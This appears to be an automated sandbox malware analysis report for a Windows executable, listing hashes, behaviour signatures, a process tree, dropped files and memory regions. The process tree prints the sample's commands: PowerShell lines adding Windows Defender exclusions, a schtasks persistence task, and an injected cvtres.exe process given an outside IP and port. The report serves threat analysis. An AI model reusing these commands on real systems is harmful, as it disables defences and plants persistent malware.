Analysis

  • max time kernel
    122s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-02-2024 02:24

General

  • Target

    aac22c5c90004cfeecd76e274e029ef3.exe

  • Size

    972KB

  • MD5

    aac22c5c90004cfeecd76e274e029ef3

  • SHA1

    eea98faea4d810e940c7d9f62fb8035a0d48b3f6

  • SHA256

    350bcbd13848e76b30da41278a0b0f3c2ca6d9c3b4e5b5cdb64ee24c8c8f9470

  • SHA512

    04cde8b071172a3f8ac5bc3f74dbcff89c2ec3c1b1884e3f6a569d82b0efcf322bbf883cfb056c29b1769688e916c731770acc355fdd5d4c8f59348779005ce3

  • SSDEEP

    12288:45DJZ9aHYol3wwuMx4tbV6LjKm96TVQxbyv99MT5t:45lalbuMWULjKgfyvM

Score
8/10

Malware Config

Signatures

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe
    "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1516
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3096
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dAFbvNYf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBF9D.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4508
    • C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe
      "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
      2⤵
        PID:1812
      • C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe
        "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4020
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 23.105.131.193 8488 sqMUAgrfv
          3⤵
            PID:3792
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            3⤵
            • Modifies Installed Components in the registry
            • Enumerates connected drives
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1092
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:2164
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
            PID:3772
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:1776
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
                PID:404
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                  PID:4840

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aac22c5c90004cfeecd76e274e029ef3.exe.log

                  Filesize

                  1KB

                  MD5

                  8ec831f3e3a3f77e4a7b9cd32b48384c

                  SHA1

                  d83f09fd87c5bd86e045873c231c14836e76a05c

                  SHA256

                  7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

                  SHA512

                  26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  968cb9309758126772781b83adb8a28f

                  SHA1

                  8da30e71accf186b2ba11da1797cf67f8f78b47c

                  SHA256

                  92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                  SHA512

                  4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  18KB

                  MD5

                  bef81051353b6871cd1e157780eb1462

                  SHA1

                  31a2dc3690d798b33d2521469c950687f3788a75

                  SHA256

                  8b29b77983e3cd31d8653dce9598a76a04e0a9df929649c4ab4cafde3f39a017

                  SHA512

                  e409fcb969b4c7628a95c7aed9097ff2ea6d97be3acf6451b16223cc4ba672e17066fa65948d78cd1e784bbd29da94eebb8a3f5b6840face038615ea9122f45f

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133535607819993314.txt

                  Filesize

                  74KB

                  MD5

                  80dffedad36ef4c303579f8c9be9dbd7

                  SHA1

                  792ca2a83d616ca82d973ece361ed9e95c95a0d8

                  SHA256

                  590ca4d2f62a7864a62ccb1075c55191f7f9d5c5304ea3446961bb50f9e3916e

                  SHA512

                  826b97a4de7c765f8f5ebc520960f68381fd9f4bfe68c2fbe46c6118110c9c14a87dcb8ed8102e60a954b4b3c408f72e7a93fd96317be3d51120a2ddd2faa3ea

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5MIHM5LV\microsoft.windows[1].xml

                  Filesize

                  96B

                  MD5

                  84209e171da10686915fe7efcd51552d

                  SHA1

                  6bf96e86a533a68eba4d703833de374e18ce6113

                  SHA256

                  04d6050009ea3c99cc718ad1c07c5d15268b459fcfb63fcb990bc9761738907b

                  SHA512

                  48d2524000911cfb68ef866dedac78ee430d79aa3f4b68399f645dc2066841e6962e11a3362cbcec46680357dcd3e58cfef9994450fed1d8af04df44f76b0dfd

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fescmboe.txv.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\tmpBF9D.tmp

                  Filesize

                  1KB

                  MD5

                  e7ab1e37cec4dffe93ca4628b8ad0005

                  SHA1

                  fdad95b82ca91fc5455fb1e7fb50684a86a227cd

                  SHA256

                  6accc2f72094c9f2902c21cc6241118aeca6cfc16eb58b42fe5ab771be4b223a

                  SHA512

                  e3e3f2bf6cb3c60111b88b941b1e72a7a53635cc29cdc2ddf7a06cb226e9b6fbb3dcd1f27f255bfde1193bb704d8fe6ca35a6a24e104f2c96377774904109736

                • memory/404-188-0x00000220A0550000-0x00000220A0570000-memory.dmp

                  Filesize

                  128KB

                • memory/404-183-0x00000220A0100000-0x00000220A0120000-memory.dmp

                  Filesize

                  128KB

                • memory/404-181-0x00000220A0140000-0x00000220A0160000-memory.dmp

                  Filesize

                  128KB

                • memory/1092-76-0x0000000003850000-0x0000000003851000-memory.dmp

                  Filesize

                  4KB

                • memory/1516-15-0x00000000030C0000-0x00000000030F6000-memory.dmp

                  Filesize

                  216KB

                • memory/1516-78-0x0000000003120000-0x0000000003130000-memory.dmp

                  Filesize

                  64KB

                • memory/1516-16-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1516-18-0x0000000003120000-0x0000000003130000-memory.dmp

                  Filesize

                  64KB

                • memory/1516-19-0x0000000003120000-0x0000000003130000-memory.dmp

                  Filesize

                  64KB

                • memory/1516-153-0x0000000008370000-0x00000000089EA000-memory.dmp

                  Filesize

                  6.5MB

                • memory/1516-83-0x0000000071100000-0x000000007114C000-memory.dmp

                  Filesize

                  304KB

                • memory/1516-44-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1516-157-0x0000000007F90000-0x0000000008026000-memory.dmp

                  Filesize

                  600KB

                • memory/1516-24-0x0000000005A20000-0x0000000005A42000-memory.dmp

                  Filesize

                  136KB

                • memory/1516-160-0x0000000007F50000-0x0000000007F5E000-memory.dmp

                  Filesize

                  56KB

                • memory/1516-73-0x0000000003120000-0x0000000003130000-memory.dmp

                  Filesize

                  64KB

                • memory/1516-68-0x0000000003120000-0x0000000003130000-memory.dmp

                  Filesize

                  64KB

                • memory/1516-31-0x0000000006390000-0x00000000063F6000-memory.dmp

                  Filesize

                  408KB

                • memory/1516-163-0x0000000008040000-0x0000000008048000-memory.dmp

                  Filesize

                  32KB

                • memory/1516-170-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1776-128-0x0000030048700000-0x0000030048720000-memory.dmp

                  Filesize

                  128KB

                • memory/1776-121-0x0000030048340000-0x0000030048360000-memory.dmp

                  Filesize

                  128KB

                • memory/1776-125-0x0000030048300000-0x0000030048320000-memory.dmp

                  Filesize

                  128KB

                • memory/2248-5-0x0000000004FE0000-0x0000000004FEA000-memory.dmp

                  Filesize

                  40KB

                • memory/2248-2-0x00000000055D0000-0x0000000005B74000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2248-3-0x0000000005020000-0x00000000050B2000-memory.dmp

                  Filesize

                  584KB

                • memory/2248-4-0x00000000052A0000-0x00000000052B0000-memory.dmp

                  Filesize

                  64KB

                • memory/2248-1-0x00000000004F0000-0x00000000005E8000-memory.dmp

                  Filesize

                  992KB

                • memory/2248-6-0x0000000005210000-0x0000000005226000-memory.dmp

                  Filesize

                  88KB

                • memory/2248-7-0x0000000006BB0000-0x0000000006C4C000-memory.dmp

                  Filesize

                  624KB

                • memory/2248-8-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2248-9-0x00000000052A0000-0x00000000052B0000-memory.dmp

                  Filesize

                  64KB

                • memory/2248-10-0x0000000000F30000-0x0000000000FB2000-memory.dmp

                  Filesize

                  520KB

                • memory/2248-11-0x0000000000D70000-0x0000000000D7E000-memory.dmp

                  Filesize

                  56KB

                • memory/2248-0-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2248-45-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3096-158-0x0000000007160000-0x0000000007171000-memory.dmp

                  Filesize

                  68KB

                • memory/3096-21-0x00000000049B0000-0x00000000049C0000-memory.dmp

                  Filesize

                  64KB

                • memory/3096-77-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3096-22-0x0000000004FF0000-0x0000000005618000-memory.dmp

                  Filesize

                  6.2MB

                • memory/3096-70-0x0000000004970000-0x000000000498E000-memory.dmp

                  Filesize

                  120KB

                • memory/3096-81-0x0000000071100000-0x000000007114C000-memory.dmp

                  Filesize

                  304KB

                • memory/3096-94-0x0000000006160000-0x000000000617E000-memory.dmp

                  Filesize

                  120KB

                • memory/3096-95-0x00000000049B0000-0x00000000049C0000-memory.dmp

                  Filesize

                  64KB

                • memory/3096-27-0x0000000004E60000-0x0000000004EC6000-memory.dmp

                  Filesize

                  408KB

                • memory/3096-49-0x0000000005620000-0x0000000005974000-memory.dmp

                  Filesize

                  3.3MB

                • memory/3096-161-0x0000000007240000-0x0000000007254000-memory.dmp

                  Filesize

                  80KB

                • memory/3096-155-0x0000000006FB0000-0x0000000006FBA000-memory.dmp

                  Filesize

                  40KB

                • memory/3096-82-0x000000007FCC0000-0x000000007FCD0000-memory.dmp

                  Filesize

                  64KB

                • memory/3096-154-0x0000000006F30000-0x0000000006F4A000-memory.dmp

                  Filesize

                  104KB

                • memory/3096-74-0x00000000049B0000-0x00000000049C0000-memory.dmp

                  Filesize

                  64KB

                • memory/3096-152-0x00000000049B0000-0x00000000049C0000-memory.dmp

                  Filesize

                  64KB

                • memory/3096-20-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3792-67-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3792-69-0x0000000004F20000-0x0000000004F30000-memory.dmp

                  Filesize

                  64KB

                • memory/3792-46-0x0000000000400000-0x0000000000412000-memory.dmp

                  Filesize

                  72KB

                • memory/4020-32-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4020-51-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4020-38-0x00000000050D0000-0x00000000050E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4020-26-0x0000000000400000-0x0000000000410000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-71-0x0000000005D10000-0x0000000005D5C000-memory.dmp

                  Filesize

                  304KB

                • memory/4508-159-0x0000000002480000-0x0000000002490000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-29-0x0000000002480000-0x0000000002490000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-156-0x0000000002480000-0x0000000002490000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-162-0x0000000007320000-0x000000000733A000-memory.dmp

                  Filesize

                  104KB

                • memory/4508-25-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4508-72-0x0000000002480000-0x0000000002490000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-28-0x0000000002480000-0x0000000002490000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-79-0x000000007F670000-0x000000007F680000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-115-0x0000000074AB0000-0x0000000075260000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4508-114-0x0000000006E90000-0x0000000006F33000-memory.dmp

                  Filesize

                  652KB

                • memory/4508-93-0x0000000071100000-0x000000007114C000-memory.dmp

                  Filesize

                  304KB

                • memory/4508-80-0x0000000006220000-0x0000000006252000-memory.dmp

                  Filesize

                  200KB

                • memory/4840-197-0x000001E830060000-0x000001E830080000-memory.dmp

                  Filesize

                  128KB

                • memory/4840-201-0x000001E830020000-0x000001E830040000-memory.dmp

                  Filesize

                  128KB

                • memory/4840-203-0x000001E830430000-0x000001E830450000-memory.dmp

                  Filesize

                  128KB